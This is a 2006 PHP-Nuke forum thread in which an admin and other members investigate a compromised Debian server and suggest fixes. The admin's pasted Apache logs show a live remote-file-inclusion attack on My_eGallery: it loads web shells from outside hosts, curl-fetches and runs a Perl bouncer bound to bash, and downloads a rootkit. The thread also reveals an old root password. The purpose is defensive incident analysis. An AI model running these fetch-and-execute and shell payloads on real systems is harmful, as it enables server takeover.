| Author |
Message |
marcelolaia
Hangin' Around
Joined: Sep 28, 2005
Posts: 36
Location: Brazil
|
 Posted:
Thu Jun 01, 2006 5:20 am |
|
Hi,
My home server was hacked and I cant found the way used for hack it.
I inspect the root's .bash_history and found this ones:
Any one could help me to find the vulnerability???
I use phpnuke 7.4 and my server is a debian stable.
I have the log files in the /var/log and i see that the file psyBNC2.3.2-4.tar.gz was created in may, 1.
Thank you |
_________________
Marcelo
http://www.posgraduando.org
O site do Pós-Graduando
Concurso, Notícias, CAPES, CNPq, FAPESP, Mestrado, Doutorado, Professor, Público, Universidade, Faculdade |
|
 
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6437
|
| Posted:
Thu Jun 01, 2006 6:21 am |
|
Sounds like a needle in a very large haystack... |
_________________
I search, therefore I exist...
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Thu Jun 01, 2006 7:14 am |
|
Doubtful this was hacked because of PHP-Nuke unless you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user level access to the server (or was it root access?).
If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. Don't know how to do that, but I know it is possible in most *nix environments. |
_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
|
| Posted:
Fri Jun 02, 2006 12:45 am |
|
| montego wrote: | | Doubtful this was hacked because of PHP-Nuke... |
Gotta agree!
I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...
Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above...  |
_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: Only registered users can see links on this board! Get registered or login! | Only registered users can see links on this board! Get registered or login! ::. |
|
 |
|
VinDSL
|
| Posted:
Fri Jun 02, 2006 12:47 am |
|
Um... BTW, if it was me, I'd disable wget and lynx!!! That's just asking for trouble... |
| |
|
|
|
|
VinDSL
|
| Posted:
Fri Jun 02, 2006 12:58 am |
|
LoL! This gets more interesting, the more I look at it!
As I hinted at above, 'they' used wget and lynx to upload the root kit[s] to your site... Then, away they went...
Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:AddType application/x-tar .tar
AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz
|
...and so forth, and so on!
Also, while you're at it, you might as well take care of RAR, since a LOT of 'script kiddies' are taking advantage of this vuln right now.
This applies to ALL Nuke web sites:
Code:AddType application/x-rar-compressed .rar
|
This has snuck under the radar at MANY mass web hosts... mostly 'cause they all use the same canned software, like cPanel/WHM  |
| |
|
|
|
|
VinDSL
|
| Posted:
Fri Jun 02, 2006 1:24 am |
|
Heh! One more post and I'll stop spamming...
Some of you might find this interesting! I posted it the other day on another web site...
==============================
To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...
Create a plain text file containing the following code:
Code:<?php print 'Oops! If you can read this, your web server is vulnerable to attack!'; ?>
|
Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.
Then, run it in your browser by entering the URL in the browser's addy bar, i.e. http://www.example.com/vindsl.php.rar
If the page shows the message:
| Quote: | | Oops! If you can read this, your web server is vulnerable to attack! |
...you should be alarmed!
If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...
============================== |
| |
|
|
|
|
marcelolaia
|
| Posted:
Fri Jun 02, 2006 5:34 am |
|
Dear kguske, montego, VinDSL,
kguske: yes, this is a needle in a very large haystack, for me! 
montego:
| Quote: | | you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server |
yes! I have a general user in my server with the same username and pass that I was using in Nuke.
| Quote: | | This guy somehow got your root password? |
Yes, the guy got my root password. My root pass was a very um commom pass. It was: DP83905AVQB . I suppose that he did a reverse conexion with a irq script and gain access to a apache shell script and do the comand "passwd" and change the root passwd. For me, he dont discovered my root passwd.
| Quote: | | If you do not have to access your server remotely (...), then you may want to disable remote user login |
Yes, I have a keyboard and monitor and mouse connected. But, my server was in another place, then I need to connect to it by SSH. But, how I write above, I suppose that the guy did a reverse connection!!!! This is the problem: how I block reverse conection and how I block access to apche shell???
VinDSL
| Quote: | | I'd disable wget and lynx!!! |
Yes, I will deinstall this two applications.
| Quote: | | Then, away they went... |
Yes, I am sure that he went!
| Quote: | Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:AddType application/x-tar .tar
AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz
|
(...)
This applies to ALL Nuke web sites:
Code:AddType application/x-rar-compressed .rar
|
|
I am sorry, but what you are suggesting me?? Where I find/modify here? In http.conf? I am sorry, but my english is very poor!!!
I am very interested, to prevent and to learn, how the guy gain access to my shell???
I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...
Thank you very much |
| |
|
|
|
|
montego
|
| Posted:
Fri Jun 02, 2006 6:22 am |
|
| Quote: |
I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...
|
The only way to confirm this, I think, is through your Apache logs.
I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I. |
| |
|
|
|
|
marcelolaia
|
| Posted:
Thu Jun 08, 2006 12:53 pm |
|
Hi Friends,
I found out what the kiddies did on my site:
here is the way:
| Quote: | 85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9" |
The script that he had used is here:
http://triton2006.100free.com/cmd.txt
Now, what I do to prevent a new attack???
Could you help me?
I wolud like to continue using a gallery. Menalto is the option?
Thank you very much |
| |
|
|
|
|
Tao_Man
Involved
Joined: Jul 15, 2004
Posts: 252
Location: OKC, OK
|
| Posted:
Thu Jun 08, 2006 3:16 pm |
|
I tried you test of vindsl.php.rar and sad to say it failed. So I added the mime types in my .htaccess file but it did not do anything. I checked on the apache site and could not find anything else to do, is there some trick?
I guess they may not have the mod_mine turned on. |
_________________
------------------------------------------
To strive, to seek, to find, but not to yield!
I don't know Kara-te but I do know cra-zy, and I WILL use it! |
|
|
|
|
kenwood
Worker
Joined: May 18, 2005
Posts: 119
Location: SVCDPlaza
|
| Posted:
Fri Jun 09, 2006 4:08 am |
|
On suse you can put the mime_magic module @ the APACHE_MODULES in the file:/etc/sysconfig/apache2 .
The MIME type goes in the file:/etc/mime.types file
Reboot apache and it will work . |
| |
|
|
|
|
montego
|
| Posted:
Fri Jun 09, 2006 6:24 am |
|
marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:
Code:
if ( !defined('MODULE_FILE') )
{
die("You can't access this file directly...");
}
|
This would prevent these direct access attempts, however, I am not 100% if this would cause issues with the operations of the tool. It they wrote it to work within the nuke "structure", meaning, everything comes in through modules.php or admin.php.
Another possible "killer" to this if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, then you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.
Unfortunately, although nuke has had many wholes which have needed patching over the years, it is only as weak as its weakest link, and if you throw in a module that has "wholes" then immediately, your whole nuke site is vulnerable.
I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure! |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
